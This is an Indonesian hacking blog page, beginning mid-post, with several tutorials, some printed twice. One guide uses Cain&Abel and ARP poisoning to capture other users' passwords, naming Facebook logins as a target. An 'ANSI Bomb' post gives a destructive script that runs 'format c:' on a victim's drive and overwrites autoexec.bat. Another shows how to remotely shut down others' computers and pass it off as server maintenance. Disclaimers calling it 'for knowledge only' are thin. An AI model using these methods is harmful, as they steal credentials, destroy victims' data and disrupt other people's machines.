Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian Sniffer pilih ethernet card yang akan anda gunakan
* Pada bagian HTTP Fields anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Facebook anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanya sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab Sniffer karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya Start/Stop Sniffer
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) ìPasswordsî
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol ì+î (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
gimana teman, lumayan rumit sih, tapi saya yakin dengan membaca langkah-langkah yang tepat dan memahaminya, pasti cara tadi bisa sukse dilaksanakan..
sekian dulu berbagi ilmu dari saya, semoga bermanfaat dan menambah ilmu..
Ketemu lagi nih sama saya, saya mau posting tentang ANSI Bomb nih teman, pasti udah pada tanya ya, apaan ANSI Bomb?. Nah ANSI Bomb ini bukan berupa virus kok, tapi lebih ke arah exploit teman-teman, dengan ANSI Bomb seluruh hard disk komputer korban kita akan "bersih" dalam sekejap.
nah mending langsung saja teman ke scriptnya :
Code:
ESC[99;"format c:";13p
ESC[66;"format c:";13p
ESC[121;121;13p
ESC[89;89;13p
ESC[110;121;13p
ESC[78;89;13p
ESC[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"Fuck You Bitch!"p
copy ke notepad, lalu save as dalam format .bat
Ini cara kerjanya sob :
Saat korban meng-klik file .bat ini, maka akan ada pertanyaan : "Are you sure you would like to format C:/Y/N.". Tentu saja korban akan menjawab N. Sebenarnya dgn menjawab N itu sama aja dgn menjawab Y. Sehingga dgn kata lain mau menjawab Y atau N itu sama aja dgn menjawab Y. Dan "pembersihan" pun di mulai...
Jangan dicoba di komputer sendiri yaa teman , karena HD kamu akan kena delete. ingat teman-teman Jangan disalahgunakan, hanya untuk pengetahuan dan nambah ilmu..
»» Selanjutnya...
nah mending langsung saja teman ke scriptnya :
Code:
ESC[99;"format c:";13p
ESC[66;"format c:";13p
ESC[121;121;13p
ESC[89;89;13p
ESC[110;121;13p
ESC[78;89;13p
ESC[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"Fuck You Bitch!"p
copy ke notepad, lalu save as dalam format .bat
Ini cara kerjanya sob :
Saat korban meng-klik file .bat ini, maka akan ada pertanyaan : "Are you sure you would like to format C:/Y/N.". Tentu saja korban akan menjawab N. Sebenarnya dgn menjawab N itu sama aja dgn menjawab Y. Sehingga dgn kata lain mau menjawab Y atau N itu sama aja dgn menjawab Y. Dan "pembersihan" pun di mulai...
Jangan dicoba di komputer sendiri yaa teman , karena HD kamu akan kena delete. ingat teman-teman Jangan disalahgunakan, hanya untuk pengetahuan dan nambah ilmu..
Malam para sobat blogger dan teman-teman semua, kembali lagi saya akan berbagi ilmu dan pengetahuan dengan teman-teman semua.
Dan lagi-lagi saya akan membagikan sebuah tips yang sangat sederhana, saya akan mengajarkan langkah-langkah remote shutdown dengan tampilan GUI (Graphic Unit Interface).
Tips ini sederhana saja tanpa menggunakan sebuah software. Cukup dengan Menggunakan Command Prompt, jadi langsung saja :
Caranya:
1. Kamu buka komputer, and klik Start->Run...di kotak isian tersebut kamu isikan CMD(Command Prompt)
2. setelah itu muncul kotak berwarna hitam di situ kamu ketikan SHUTDOWN.EXE (spasi) -i (spasi) m
3. Contoh: Shutdown.exe - i -m.......lalu kamu tekan Enter
4. maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog"
5. Kamu klik "ADD" -> untuk menambahkan IP target or nama target di LANÖ
or kamu klik "Browse" untuk mencari otomatis
6. Kamu bisa tentuin yang enaknya buat ngusilin komputer orang itu, apakah
di shutdown, restart, or Log off
7. Tentukan time yang pas buat deat time-nya komputer itu beraksi
8. kamu bisa tambakan other (planned), ini dimaksudkan agar si user lawan
mengira kalo ini ulah server yang lagi maintenance
9. Kirim kan pesan kematian mu ke komputer orang di COMMENT
10. Tertawalah yang puas melihat orang lain kebingungan.. hahahahahahahahaha
Setelah tadi melakukan shutdown dengan tampilan GUI, sekarang saya akan mengajarkan cara Remote Shutdown hanya dengan Command Prompt saja.
Caranya sama sederhananya seperti diatas, kamu hanya cukup masuk Run -> Shutdown ñs ñm //nama/IPkomputer ñc ìkomentar andaî. Kemudian Enter
-I = Tampilan GUI
-L= Log Off
-S= Shutdown
-R= Restart
-A= Batalkan Perintah Shutdown
-M= Nama/IP Komputer
-C= Komentar pada Perintah Shutdown
-T= Memberi waktu pada perintah Shutdown
-F= Matikan Proses yang program yang berjalan
-D= Tambahan pada perintah Shutdown
Tips sederhana.
Kalo mau cara cepat, kamu cukup masukkan perintah tersebut pada menu Run. Mis : Run -> Shutdown -s -m //nama/IPkomputer -c komentar anda. Kemudian Enter
cukup sederhana kan teman-teman..
jadi silahkan yang suka jail sama temannya bisa dipraktekan, hehehe, tapi jgn keterlaluan yaa teman-teman, sekali lagi ini cuma sekedar untuk pengetahuan dan nambah ilmu..
sekian dari saya kali ini, terima kasih banyak.
sampai jumpa di postingan saya selanjutnya..
»» Selanjutnya...
Dan lagi-lagi saya akan membagikan sebuah tips yang sangat sederhana, saya akan mengajarkan langkah-langkah remote shutdown dengan tampilan GUI (Graphic Unit Interface).
Tips ini sederhana saja tanpa menggunakan sebuah software. Cukup dengan Menggunakan Command Prompt, jadi langsung saja :
Caranya:
1. Kamu buka komputer, and klik Start->Run...di kotak isian tersebut kamu isikan CMD(Command Prompt)
2. setelah itu muncul kotak berwarna hitam di situ kamu ketikan SHUTDOWN.EXE (spasi) -i (spasi) m
3. Contoh: Shutdown.exe - i -m.......lalu kamu tekan Enter
4. maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog"
5. Kamu klik "ADD" -> untuk menambahkan IP target or nama target di LANÖ
or kamu klik "Browse" untuk mencari otomatis
6. Kamu bisa tentuin yang enaknya buat ngusilin komputer orang itu, apakah
di shutdown, restart, or Log off
7. Tentukan time yang pas buat deat time-nya komputer itu beraksi
8. kamu bisa tambakan other (planned), ini dimaksudkan agar si user lawan
mengira kalo ini ulah server yang lagi maintenance
9. Kirim kan pesan kematian mu ke komputer orang di COMMENT
10. Tertawalah yang puas melihat orang lain kebingungan.. hahahahahahahahaha
Setelah tadi melakukan shutdown dengan tampilan GUI, sekarang saya akan mengajarkan cara Remote Shutdown hanya dengan Command Prompt saja.
Caranya sama sederhananya seperti diatas, kamu hanya cukup masuk Run -> Shutdown ñs ñm //nama/IPkomputer ñc ìkomentar andaî. Kemudian Enter
-I = Tampilan GUI
-L= Log Off
-S= Shutdown
-R= Restart
-A= Batalkan Perintah Shutdown
-M= Nama/IP Komputer
-C= Komentar pada Perintah Shutdown
-T= Memberi waktu pada perintah Shutdown
-F= Matikan Proses yang program yang berjalan
-D= Tambahan pada perintah Shutdown
Tips sederhana.
Kalo mau cara cepat, kamu cukup masukkan perintah tersebut pada menu Run. Mis : Run -> Shutdown -s -m //nama/IPkomputer -c komentar anda. Kemudian Enter
cukup sederhana kan teman-teman..
jadi silahkan yang suka jail sama temannya bisa dipraktekan, hehehe, tapi jgn keterlaluan yaa teman-teman, sekali lagi ini cuma sekedar untuk pengetahuan dan nambah ilmu..
sekian dari saya kali ini, terima kasih banyak.
sampai jumpa di postingan saya selanjutnya..
Langganan:
Komentar (Atom)
